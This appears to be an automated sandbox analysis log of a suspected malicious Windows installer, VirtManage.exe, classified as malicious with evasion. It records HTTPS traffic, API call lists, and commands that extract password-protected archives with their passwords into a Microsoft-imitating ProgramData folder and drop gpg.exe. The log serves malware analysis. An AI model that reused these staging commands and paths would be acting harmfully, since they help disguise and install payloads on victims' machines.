Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.153.11:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49793 version: TLS 1.2
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040573B
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00406DE60_2_00406DE6
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004075BD0_2_004075BD
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004BF8C01_2_004BF8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0047A1501_2_0047A150
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004124401_2_00412440
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004E04001_2_004E0400
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004245701_2_00424570
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004605C21_2_004605C2
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004745E01_2_004745E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0048E5E01_2_0048E5E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004986001_2_00498600
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004506901_2_00450690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0046A6901_2_0046A690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004387E01_2_004387E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004CC8C01_2_004CC8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0040CAD01_2_0040CAD0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004D2AE01_2_004D2AE0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00434B601_2_00434B60
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0047CB281_2_0047CB28
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004A2BF01_2_004A2BF0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00466B861_2_00466B86
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0045CB801_2_0045CB80
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00406C101_2_00406C10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0042D0701_2_0042D070
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004191691_2_00419169
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0046D1001_2_0046D100
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044D1801_2_0044D180
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004E11901_2_004E1190
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004A53001_2_004A5300
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0040D5111_2_0040D511
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004BB6F01_2_004BB6F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004779401_2_00477940
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00433AC01_2_00433AC0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0042DD101_2_0042DD10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004BF8C03_2_004BF8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0047A1503_2_0047A150
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004124403_2_00412440
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004E04003_2_004E0400
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004245703_2_00424570
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004605C23_2_004605C2
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004745E03_2_004745E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0048E5E03_2_0048E5E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004986003_2_00498600
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004506903_2_00450690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0046A6903_2_0046A690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004387E03_2_004387E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004CC8C03_2_004CC8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0040CAD03_2_0040CAD0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004D2AE03_2_004D2AE0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00434B603_2_00434B60
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0047CB283_2_0047CB28
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004A2BF03_2_004A2BF0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00466B863_2_00466B86
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0045CB803_2_0045CB80
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00406C103_2_00406C10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0042D0703_2_0042D070
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004191693_2_00419169
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0046D1003_2_0046D100
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044D1803_2_0044D180
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004E11903_2_004E1190
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004A53003_2_004A5300
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0040D5113_2_0040D511
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004BB6F03_2_004BB6F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004779403_2_00477940
Source: C:\Users\user\Desktop\VirtManage.exeProcess token adjusted: SecurityJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: String function: 004DF490 appears 136 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: String function: 00426BB0 appears 61 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: String function: 004DF438 appears 58 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: String function: 004DEFB0 appears 170 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: String function: 004C0240 appears 53 times
Source: zlib1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libgcrypt-20.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libnpth-0.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: aclui-2.dll.16.drStatic PE information: Number of sections : 20 > 10
Source: libgpg-error-0.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libassuan-9.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: aclui.dll.16.drStatic PE information: Number of sections : 20 > 10
Source: aclui.dll.0.drStatic PE information: Number of sections : 20 > 10
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegpg-agent.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegpg.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibassuan.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibgcrypt.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibgpg-error.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibnpth.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000002.3342705388.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamensis7z.dll, vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEVIEW.EXEj% vs VirtManage.exe
Source: VirtManage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPIJump to behavior
Source: classification engineClassification label: mal46.expl.evad.winEXE@56/81@2/3
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004AE4A0 FormatMessageA,strlen,GetLastError,1_2_004AE4A0
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049E7
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\Users\user\AppData\Roaming\gnupgJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrFBD1.tmpJump to behavior
Source: VirtManage.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\VirtManage.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table if not exists encryptions (binding INTEGER NOT NULL, time INTEGER);create index if not exists encryptions_binding on encryptions (binding);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table version (version INTEGER);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: insert into version values (1);
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select count(*) from sqlite_master where type='table';
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select ((select count(*) from ultimately_trusted_keys where (keyid in (%s))) == %d) and ((select count(*) from ultimately_trusted_keys where keyid not in (%s)) == 0);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select user_id, policy from bindings where fingerprint = ?;
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select fingerprint || case sum(conflict NOTNULL) when 0 then '' else '!' end from bindings where email = ? group by fingerprint order by fingerprint = ? asc, fingerprint desc;
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: insert into ultimately_trusted_keys values ('%s');
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.916314177.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table if not exists ultimately_trusted_keys (keyid);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table version (version INTEGER);error initializing TOFU database: %s
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
